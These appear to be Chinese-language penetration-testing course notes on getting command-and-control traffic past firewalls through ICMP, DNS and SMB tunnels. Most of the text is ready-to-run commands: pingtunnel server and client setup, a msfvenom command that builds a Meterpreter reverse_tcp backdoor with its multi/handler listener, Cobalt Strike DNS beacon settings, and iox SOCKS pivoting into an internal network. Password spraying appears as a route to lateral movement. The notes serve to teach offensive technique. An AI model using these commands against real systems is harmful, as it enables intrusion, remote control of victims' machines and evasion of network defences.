知识点:
1、隧道技术篇-网络层-ICMP协议-判断&封装&建立&穿透
2、隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透
3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透
0、不是有互联网才叫出网
1、C2常见上线采用的协议
2、常见的协议层出网判断
协议 判断命令
ICMP ping ip or domain
HTTP curl ip or domain
SSH ssh ip or domain
DNS nslookup domain
TCP telnet ip port
... ................
3、常用的隧道技术
利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络(C2上线、信息收集)
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
一、演示案例-隧道技术-ICMP-探针&搭建-C2上线&穿透
C2上线-开防火墙入站只80&出站只放ICMP:
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。
应用场景:80为入口权限点,ICMP为上线突破口
适用场景:目标入站正向被拦截,出站有ICMP出网
排查出网协议:curl nslookup ping等命令
CS上线
ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel
https://github.com/esrrhs/pingtunnel
服务端
./pingtunnel -type server
客户端
pingtunnel -type client -l :6666 -s 192.168.139.141 -t 192.168.139.141:7777 -tcp 1 -noprint 1 -nolog 1
CS监听器配置
127.0.0.1 6666(后门生成)
为什么生成http后门,因为http协议其实是属于tcp协议。
192.168.139.141 7777(监听上线)
MSF上线
ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel
服务端
./pingtunnel -type server
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe
MSF监听器配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run
二、演示案例-隧道技术-DNS-探针&搭建-C2上线&穿透
C2上线-开防火墙入站只80&出站只放DNS:
应用场景:80为入口权限点,DNS为上线突破口
适用场景:目标入站正向被拦截,出站有DNS出网
排查出网协议:curl nslookup ping等命令
CS上线
域名申请及配置(域名绑定一个外网VPS)
监听器创建及配置
后门绑定监听器生成
checkin
mode dns-txt
MSF上线
MSF的DNS模块已删除
三、演示案例-C2上线-SMB-开防火墙入站只445
SMB一般在防火墙入站默认是开启的,判断目标端口是否开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
四、演示案例-后续穿透问题
ICMP穿透-Pingtunel配合iox代理Socks内网穿透
https://github.com/EddieIvan01/iox
C2服务器
接收客户端传递的ICMP
./pingtunnel -type server -noprint 1 -nolog 1 -key 000000
将本地4455转至5566端口
./iox.exe proxy -l 4455 -l 5566
Web
将本地2222的TCP封装IMCP给192.168.139.141:4455
pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000
建立SockS节点绑定2222端口:
iox.exe proxy -r 127.0.0.1:2222
之后C2服务器会行成一个socks5代理
本地